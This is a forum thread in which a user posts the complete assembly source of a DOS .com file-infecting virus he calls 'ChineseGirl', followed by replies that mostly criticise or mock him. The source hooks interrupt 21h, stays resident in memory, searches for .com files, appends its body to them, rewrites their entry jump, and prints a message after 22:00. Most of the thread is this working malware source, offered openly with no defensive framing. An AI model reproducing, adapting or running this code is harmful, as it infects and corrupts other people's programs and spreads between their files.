Page 1 of 2 12 LastLast
Results 1 to 10 of 19

Thread: nakoka's "ChineseGirl"

  1. #1

    nakoka's "ChineseGirl"

    THis is My first Virus in my life.She called ChineseGirl.I had Finished it about 2years ago.it just a small Virus. I belive "assemble language + C = nuclear weapon" all the time!

    code segment
    assume cs:code,ds:code
    org 0h
    begin :

    push ax
    push bx
    push cx
    push dx
    push bp
    push si
    push di
    push ds
    push es

    jmp ChineseGirl
    handle dw ?
    jmp db 0e9h
    message db 'ChineseGirl! $'
    len dw ?
    real dw ?
    dss dw ?
    path db '*.com',0
    fpath db '\dos\*.com',0
    dos db '\dos\',13 dup(?)
    no db 'Z'
    hh dd 11112222h
    tc db 2eh
    tc1 dw 2effh
    tc2 dw 004ah
    dta db 45 dup(?)

    zd proc far

    mov bx,cs
    mov es,bx
    mov ds,bx

    push es
    mov bx,8d00h
    mov es,bx
    cmp byte ptr es:[0049h],'D'
    pop es
    je o1
    jmp o
    o1:
    push es
    mov bx,0
    mov es,bx
    cmp word ptr es:[86h],8d00h
    pop es
    je nochg
    o:
    save_21:
    push es
    mov ax,3521h
    int 21h
    mov di,offset hh
    call oldlen
    add di,ax
    mov [di+2],bx
    mov [di+2+2],es
    pop es

    jmp zg
    stop1:
    jmp stop
    zg:

    mov ax,ds:[101h]
    add ax,3
    add ax,100h
    mov si,ax
    mov ax,8d00h
    push es
    mov es,ax
    mov di,0
    mov cx,673
    rep movsb
    mov byte ptr es:[49h],'D'
    pop es
    push ds
    mov ds,ax
    mov ah,tc
    mov byte ptr [di],ah
    mov ax,tc1
    mov word ptr [di+1],ax
    mov ax,tc2
    mov word ptr [di+3],ax
    pop ds

    chage_21h:
    push ds
    mov ax,8d00h
    mov ds,ax
    mov ax,2521h
    mov dx,0
    int 21h
    pop ds

    jmp stop

    nochg:
    mov bx,cs
    cmp bx,8d00h
    jne stop

    cmp ah,30h
    je n
    pop es
    pop ds
    pop di
    pop si
    pop bp
    pop dx
    pop cx
    pop bx
    pop ax
    jmp cs:hh

    n:
    mov dx,offset dta
    mov ah,1ah
    int 21h

    mov ah,2ch
    int 21h
    cmp ch,22
    jb fn
    mov dx,offset fpath
    jmp f
    fn: mov dx,offset path
    f:
    mov ah,4eh
    mov cx,0
    int 21h

    start:
    cmp ax,0002
    jz stop
    cmp ax,0003
    je stop
    cmp ax,0018
    je stop

    jmp open
    stop:jmp bdend

    open:
    mov ah,2ch
    int 21h
    cmp ch,22
    jb ro
    mov di,offset dos +5
    mov bx,offset dta +30
    mov dx,offset dos
    mov si,bx
    mov cx,13
    rep movsb
    jmp roc
    ro: mov dx,offset dta +30
    roc:
    mov al,2
    mov ah,3dh
    int 21h
    mov bx,ax
    mov dx,offset handle
    mov si,dx
    mov [si],bx

    readlen:
    mov dx,offset dta+26
    mov si,dx
    mov bx,[si]
    c:
    mov dx,offset dss
    mov si,dx
    mov [si],bx
    add bx,100h
    sub bx,103h
    mov dx,offset len
    mov si,dx
    mov [si],bx

    read:
    mov al,0
    mov dx,1
    mov cx,0
    call seek
    mov dx,offset handle
    mov si,dx
    mov bx,[si]
    mov dx,offset real
    mov ah,3fh
    mov cx,2
    int 21h

    mov si,dx
    push si
    mov bx,[si]
    add bx,103h
    mov dx,offset dss
    mov si,dx

    mov dx,bx
    sub dx,100h
    add dx,673+3
    cmp dx,[si]

    jne ee
    pop si
    jmp close

    ee: push si
    add [si],100h+673
    sub bx,3
    pop si
    sub bx,[si]
    pop si
    mov [si],bx

    writebd:
    mov dx,0
    mov cx,0
    mov al,2
    call seek
    mov cx,673
    mov dx,offset begin
    call write

    writee9:
    mov dx,0
    mov cx,0
    mov al,2
    call seek
    mov cx,1
    mov dx,offset jmp
    call write

    writejmp:
    mov dx,1
    mov cx,0
    mov al,0
    call seek
    mov cx,2
    mov dx,offset len
    call write

    writereal:
    mov dx,0
    mov cx,0
    mov al,2
    call seek
    mov cx,2
    mov dx,offset real
    call write

    close:
    mov dx,offset handle
    mov si,dx
    mov ah,3eh
    mov bx,[si]
    int 21h

    mov ah,2ch
    int 21h
    cmp ch,22
    jb findnext

    print:
    mov dx,offset message
    mov ah,09h
    int 21h

    findnext:

    mov ah,2ch
    int 21h
    cmp ch,22
    jb fnn
    mov dx,offset fpath
    jmp fff
    fnn: mov dx,offset path
    fff:
    mov ah,4fh
    int 21h

    jmp start

    int 20h
    zd endp

    seek proc near
    push ax
    mov bx,offset handle
    mov si,bx
    mov bx,[si]
    pop ax
    mov ah,42h
    int 21h
    ret
    seek endp

    oldlen proc near
    mov ax,cs:[101h]
    add ax,101h
    ret
    oldlen endp

    write proc near
    mov bx,offset handle
    mov si,bx
    mov ah,40h
    mov bx,[si]
    int 21h
    ret
    write endp

    bdend:
    pop es
    pop ds
    pop di
    pop si
    pop bp
    pop dx
    pop cx
    pop bx
    pop ax

    code ends
    end begin

  2. #2
    Senior Member
    Join Date
    Sep 2001
    Posts
    412
    Hehbris, is that you?

  3. #3
    PHP/PostgreSQL guy
    Join Date
    Dec 2001
    Posts
    1,164
    Hmmm...Nakoka, I'm not really sure what you're trying to accomplish here. If you're trying to show your 'prowess' with assembly, I'm not seeing many people who actually care. If
    you're trying to outdo the other people here who actually have proven they know what they're talking about, observe the relative silence you're getting. Why don't you write something that's for the 'good' of the computer world (if your program actually does anything worthwhile and it's not a copy/paste job like I think it is) instead of trying to be a "badass"?
    We the willing, led by the unknowing, have been doing the impossible for the ungrateful. We have done so much with so little for so long that we are now qualified to do just about anything with almost nothing.

  4. #4
    Hey Fella. I have a question. Why do you keep posting stuff like this? The majority of us are here to learn what we can about protecting ourselves and our resources from people like you.
    We Know Who You Are.....

  5. #5
    Member
    Join Date
    Nov 2001
    Posts
    79

    Thumbs down foul smell....

    Would someone please take the garbage out???? It would be greatly appreciated if *cough*nakoka*cough* was removed or silenced.

  6. #6
    Senior Member
    Join Date
    Sep 2001
    Posts
    429
    nakoka is posting some wierd stuff but at least he's not being a total pain in the ass (unlike hehebris).
    Why silence this?

    Big brother move over.. cheez_cake's in town!

  7. #7
    Member
    Join Date
    Nov 2001
    Posts
    79

    Talking alright then

    wellll, I wouldn't call myself big brother by far!!!!!! but if everyone wants a toy... it is Christmas so I'll grant everyone that. nakoka is now officially the town (AO) fool for all to brow beat until the first of the year. That is my decree...

    For those of you who don't celebrate Christmas... may this be your gift for your holiday (Ramastand, Hanukah, Kwanzaa, Yule, etc....)

  8. #8
    Hi mom!
    Join Date
    Aug 2001
    Posts
    1,103
    I said it before, and I'll say it again: I like source code posts. Most of his other posts are another story though - but don't ban him for this.

  9. #9
    Senior Member
    Join Date
    Nov 2001
    Posts
    472
    I agree Guus. Apparently this guy got some talent, too bad he can't explain the code some more to make it easier for us non-assembley guys to understand. He better stop programming and take an english course. What do you say, nakoka?
    ---
    proactive

  10. #10
    Junior Member
    Join Date
    Dec 2001
    Posts
    13

    I think hes just trying to help

    I think hes just trying to help those of us who don't know how to do things of this sort. Perhaps he wants to brag a bit but I think we should allow him that. He obviously knows what he is talking about and I believe that he should not be punished for that. These forums are here to learn from. I do agree with the others on the fact that you could explain a little more what your code does and how we could be able to do something similar, but please keep posting. I for one find it interesting.
    \"This is our world now...the world of the electron and the switch, the beauty of the baud.
    We make use of a service already existing without paying for what could be dirt cheep if it
    wasn\'t run by profiteering gluttons, and you call us criminals. We explore...and you call us
    criminals. We exist without skin color, without nationality, without religious bias...and you
    call us criminals. You build atomic bombs, wage wars, murder, cheat, and lie to us and try to
    make us believe it is for our own good, yet we\'re the criminals.
    Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by
    what they say and think, not what they look like. My crime is that of outsmarting you, something
    that you will never forgive me for. I am a hacker and this is my manifesto. You may stop this
    individual, but you can\'t stop us all...after all, we\'re all alike.\"

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •